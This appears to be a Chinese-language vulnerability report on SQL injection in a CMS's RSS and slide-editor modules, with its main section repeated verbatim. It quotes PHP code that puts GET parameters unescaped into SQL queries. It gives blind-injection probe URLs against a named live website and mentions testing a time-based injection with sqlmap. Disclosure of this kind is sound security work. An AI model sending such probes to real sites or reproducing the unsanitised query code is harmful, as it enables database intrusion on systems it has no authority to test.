### 简要描述: 不是全部网站都安装了这几个模板,这个模板用户量一般 ### 详细说明: 漏洞文件是/apps/rss/controller/fullsite.php中 ``` public function get_sectiondata(){ $sectionid = $_GET['sectionid']; //多个以','隔开 $outtyle = $_GET['outtyle'];//输出类型 $section_list = $this->_rss->ls_section($sectionid); $data = array(); foreach($section_list as $section){ if ($section['data'] && ($section['data']{0} == '{' || $section['data']{0} == '[')) { $data[] = json_decode($section['data'], true); } else { $data[] = unserialize($section['data']); ``` 跟踪ls_section函数 在/apps/rss/model/fullsite.php中 ``` function ls_section($sectionid){ $sql = "SELECT * FROM `#table_section` "; if($sectionid) $sql .= " WHERE sectionid IN (".$sectionid.")"; $sql .= " ORDER BY sectionid DESC"; $data = $this->db->select($sql); return $data; } ``` ``` $sectionid = $_GET['sectionid']; (".$sectionid.")"; ``` 可以看到没有过滤也没有单引号,不知道是不是有过滤,因为我源码没有完整解密 我们要减法盲注测试下是不是存在注入 一号 ``` http://app.ellechina.com/?app=rss&controller=fullsite&action=get_sectiondata§ionid=1&outtyle=1...
### 简要描述: 不是全部网站都安装了这几个模板,这个模板用户量一般 ### 详细说明: 漏洞文件是/apps/rss/controller/fullsite.php中 ``` public function get_sectiondata(){ $sectionid = $_GET['sectionid']; //多个以','隔开 $outtyle = $_GET['outtyle'];//输出类型 $section_list = $this->_rss->ls_section($sectionid); $data = array(); foreach($section_list as $section){ if ($section['data'] && ($section['data']{0} == '{' || $section['data']{0} == '[')) { $data[] = json_decode($section['data'], true); } else { $data[] = unserialize($section['data']); ``` 跟踪ls_section函数 在/apps/rss/model/fullsite.php中 ``` function ls_section($sectionid){ $sql = "SELECT * FROM `#table_section` "; if($sectionid) $sql .= " WHERE sectionid IN (".$sectionid.")"; $sql .= " ORDER BY sectionid DESC"; $data = $this->db->select($sql); return $data; } ``` ``` $sectionid = $_GET['sectionid']; (".$sectionid.")"; ``` 可以看到没有过滤也没有单引号,不知道是不是有过滤,因为我源码没有完整解密 我们要减法盲注测试下是不是存在注入 一号 ``` http://app.ellechina.com/?app=rss&controller=fullsite&action=get_sectiondata§ionid=1&outtyle=1 ``` 二号 ``` http://app.ellechina.com/?app=rss&controller=fullsite&action=get_sectiondata§ionid=2-1&outtyle=1 ``` 三号 ``` http://app.ellechina.com/?app=rss&controller=fullsite&action=get_sectiondata§ionid=2&outtyle=1 ``` 一号的值是1和二号的2-1=1是等于,返回了同样的数据 而三号是2,所以返回不同,所以存在注入 [<img src="https://images.seebug.org/upload/201510/05145940966685542c7a799a727dfd5da27dad65.png" alt="XI8U{`~R9{N3WB76K)[6[_S.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/05145940966685542c7a799a727dfd5da27dad65.png) [<img src="https://images.seebug.org/upload/201510/051459491a1ddf4ad9d31463dd51972596e0ff82.png" alt="QQ截图20151005145909.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/051459491a1ddf4ad9d31463dd51972596e0ff82.png) [<img src="https://images.seebug.org/upload/201510/05145957bc90609c052caaf1ddc816c2c5312c4c.png" alt="QQ截图20151005145926.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/05145957bc90609c052caaf1ddc816c2c5312c4c.png) 第二处在/apps/rss/controller/fullsite.php中 ``` public function get_category(){ $categoryid = $_GET['categoryid']; //多个以','隔开 $outtyle = $_GET['outtyle'];//输出类型 $category_list = $this->_rss->ls_category($categoryid); $this->template->assign('list',$category_list); ``` 跟踪ls_category函数 在/apps/rss/model/fullsite.php中 ``` //获取栏目数据信息的数据 function ls_category($categoryid){ $sql = "SELECT * FROM `#table_category` "; if($categoryid) $sql .= " WHERE catid IN (".$categoryid.")"; $sql .= " ORDER BY catid DESC"; $data = $this->db->select($sql); return $data; ``` 和第一处一样就不演示了 第三处是延时注入 在apps\editor\controller\slide.php中 ``` public function pic_html() { $idtmp = explode(',',$_GET['id']); foreach($idtmp as $k=>$v){ if(!empty($v)){ $id[] = $v; } } $db = factory::db(); //得到$id[0]组图信息 $data = $db->select("SELECT * FROM #table_picture_group WHERE contentid=$id[0] ORDER BY sort ASC"); $html .= '<p><div class="picgroup"><div class="moverpic"><ul class="mover">'; $_count = 0; foreach($data as $value) ``` ``` $idtmp = explode(',',$_GET['id']); $data = $db->select("SELECT * FROM #table_picture_group WHERE contentid=$id[0] ORDER BY sort ASC"); ``` 分割后带入查询了,我们用sqlmap测试一下 [<img src="https://images.seebug.org/upload/201510/0711085666b43e65f069ee44aef00796a947e2be.png" alt="QQ截图20151007110840.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/0711085666b43e65f069ee44aef00796a947e2be.png) ### 漏洞证明: 漏洞文件是/apps/rss/controller/fullsite.php中 ``` public function get_sectiondata(){ $sectionid = $_GET['sectionid']; //多个以','隔开 $outtyle = $_GET['outtyle'];//输出类型 $section_list = $this->_rss->ls_section($sectionid); $data = array(); foreach($section_list as $section){ if ($section['data'] && ($section['data']{0} == '{' || $section['data']{0} == '[')) { $data[] = json_decode($section['data'], true); } else { $data[] = unserialize($section['data']); ``` 跟踪ls_section函数 在/apps/rss/model/fullsite.php中 ``` function ls_section($sectionid){ $sql = "SELECT * FROM `#table_section` "; if($sectionid) $sql .= " WHERE sectionid IN (".$sectionid.")"; $sql .= " ORDER BY sectionid DESC"; $data = $this->db->select($sql); return $data; } ``` ``` $sectionid = $_GET['sectionid']; (".$sectionid.")"; ``` 可以看到没有过滤也没有单引号,不知道是不是有过滤,因为我源码没有完整解密 我们要减法盲注测试下是不是存在注入 一号 ``` http://app.ellechina.com/?app=rss&controller=fullsite&action=get_sectiondata§ionid=1&outtyle=1 ``` 二号 ``` http://app.ellechina.com/?app=rss&controller=fullsite&action=get_sectiondata§ionid=2-1&outtyle=1 ``` 三号 ``` http://app.ellechina.com/?app=rss&controller=fullsite&action=get_sectiondata§ionid=2&outtyle=1 ``` 一号的值是1和二号的2-1=1是等于,返回了同样的数据 而三号是2,所以返回不同,所以存在注入 [<img src="https://images.seebug.org/upload/201510/05145940966685542c7a799a727dfd5da27dad65.png" alt="XI8U{`~R9{N3WB76K)[6[_S.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/05145940966685542c7a799a727dfd5da27dad65.png) [<img src="https://images.seebug.org/upload/201510/051459491a1ddf4ad9d31463dd51972596e0ff82.png" alt="QQ截图20151005145909.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/051459491a1ddf4ad9d31463dd51972596e0ff82.png) [<img src="https://images.seebug.org/upload/201510/05145957bc90609c052caaf1ddc816c2c5312c4c.png" alt="QQ截图20151005145926.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/05145957bc90609c052caaf1ddc816c2c5312c4c.png) 第二处在/apps/rss/controller/fullsite.php中 ``` public function get_category(){ $categoryid = $_GET['categoryid']; //多个以','隔开 $outtyle = $_GET['outtyle'];//输出类型 $category_list = $this->_rss->ls_category($categoryid); $this->template->assign('list',$category_list); ``` 跟踪ls_category函数 在/apps/rss/model/fullsite.php中 ``` //获取栏目数据信息的数据 function ls_category($categoryid){ $sql = "SELECT * FROM `#table_category` "; if($categoryid) $sql .= " WHERE catid IN (".$categoryid.")"; $sql .= " ORDER BY catid DESC"; $data = $this->db->select($sql); return $data; ``` 和第一处一样就不演示了 第三处是延时注入 在apps\editor\controller\slide.php中 ``` public function pic_html() { $idtmp = explode(',',$_GET['id']); foreach($idtmp as $k=>$v){ if(!empty($v)){ $id[] = $v; } } $db = factory::db(); //得到$id[0]组图信息 $data = $db->select("SELECT * FROM #table_picture_group WHERE contentid=$id[0] ORDER BY sort ASC"); $html .= '<p><div class="picgroup"><div class="moverpic"><ul class="mover">'; $_count = 0; foreach($data as $value) ``` ``` $idtmp = explode(',',$_GET['id']); $data = $db->select("SELECT * FROM #table_picture_group WHERE contentid=$id[0] ORDER BY sort ASC"); ``` 分割后带入查询了,我们用sqlmap测试一下 [<img src="https://images.seebug.org/upload/201510/0711085666b43e65f069ee44aef00796a947e2be.png" alt="QQ截图20151007110840.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/0711085666b43e65f069ee44aef00796a947e2be.png)